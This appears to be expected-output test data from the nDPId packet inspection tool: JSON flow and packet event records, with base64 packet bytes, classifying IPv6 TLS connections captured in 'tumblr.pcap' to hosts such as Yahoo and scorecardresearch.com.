-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105299,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDobnvZrixr2XoBJXgG87AAACBAV4AQMDAwQCCArC3Z5DUVPzrw=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105299,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZeG572bgBAB+\/MzAAABAQgKUVPzyMLdnkM="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105418,"flow_last_seen":1605292105418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105418,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605292105418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105418,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3sAAAAAoAL9IOHqAAACBAWgBAIIChNm5EYAAAAAAQMDBw=="} -00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105433,"flow_last_seen":1605292105433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105433,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605292105433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105433,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACgGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5MAAAAAoAL9IMKvAAACBAWgBAIICr4D0hAAAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605292105447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105447,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY8Go+Ou0O5ht8oBJXgIDEAAACBAV4AQMDAwQCCArC3Z7YE2bkRg=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605292105447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105447,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3xqPjrugBAB+wS5AAABAQgKE2bkY8Ldntg="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105459,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSABSZgAFAgAAAAAAAAAEAEqAcsBIEmLB5kd7IUo3\/YpAbu4DgNW0a1gJBeUoBJXgDGmAAACBAV4AQMDAwQCCArC3Z7jvgPSEA=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105459,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACAGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5QDVtGugBAB+7WdAAABAQgKvgPSKsLdnuM="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAJgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOk4W2C\/9gBhA0URlAAABAQgKBcmbq8LdLRcXAwMAcysuUqnNdP5CtlTC2pWvfZyUMV8UFocs8M6W09NnsspPibPhqobMFIm1f0B4kk13U59rzTyXjGQM3JpbSJkQg4GGmBSNMo7KgMloXnt3GygjcT75OOC0YPo3\/MFdKUwkpDu47ubalsF7IwgRDAn\/l0DFoLo="} -00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOsYW2C\/9gBhA0ehRAAABAQgKBcmbrMLdLRcXAwMAIgQb59HIMHYAgoaCAJqbMMjq72ntBt\/\/eGErLyXH34Iczsk="} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":215,"pkt_l4_len":161,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAKEGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOu0W2C\/9gBhA0aEtAAABAQgKBcmbrMLdLRcXAwMAfBkhBkIFqMuMKjD1\/xjqGp2hEKMP3ziLomYjJXbyDDBzMNKC8MmFqfqAj9+xvxfAO7rBldu4UpazYVXmg399TnFcypI7qckvMpQyy6kehQ5F75J5BlTYjgokme9I6h8+9mS8Y6D2WQEp5qh0Ix9\/vReZo1xT0xocl8k7wFQ="} -00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605292105726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":213,"pkt_l4_len":159,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAJ8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npntnZTJergBgB9damAAABAQgKLIniTsLdLfkXAwMAepLzP8oRHbXAD5D56fW\/ezxXNRxKdaqM6BwQpjw0zyORx06Rl8gHWinoWY19NxmIXl2owLgVHJ\/UEVkHmda\/PMinu6FgCqLeUi5RUsVJaGqL1ulKRH6Mi5nxYau2z9M9f+jUaBIVXH47AOoxy+jPs5YTh+8Es3OdfTIr"} -00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605292105726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npn1jZTJergBgB9c+fAAABAQgKLIniTsLdLfkXAwMAInb0OIEXDizCLxamWTiLwYinYzi396zhkwGnl1I5tNs4gXU="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605292105774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105774,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATAMqAcsBIEmLB5kd7IUo3\/YpAbvKotlMl6u56Z9YgBALghHTAAABAQgKwt2gFiyJ4k4="} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3wyDoZi2igBBBsd06AAABAQgKqXtZHsLc+wU="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwVJeVyjqfgBBI2yKLAAABAQgKqXtZHsLc+ww="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2779,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108747,"flow_last_seen":1605292108747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108747,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2779,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605292108747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108747,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3N5hBwa5pgBAB9TOKAAABAQgKqXtZHsLc+w0="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2780,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108747,"flow_last_seen":1605292108747,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108747,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2780,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605292108747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108747,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOpKNiTUmPgBAFOCVEAAABAQgKqXtZHsLc+ww="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2790,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605292108789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108789,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBuhmLaKJd8MhgBAN560UAAABAQgKwt2r5al1DDM="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2796,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108796,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9JXKOp\/xMFSYgBAPnfW6AAABAQgKwt2r7Kl1DlE="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2797,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108796,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBrmkkNzeZgBALy8PxAAABAQgKwt2r7al1DgU="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605292108805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108805,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdAmJNSY8GjqSkgBAMILKCAAABAQgKwt2r9ql1FBI="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108895,"flow_last_seen":1605292108895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292108895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 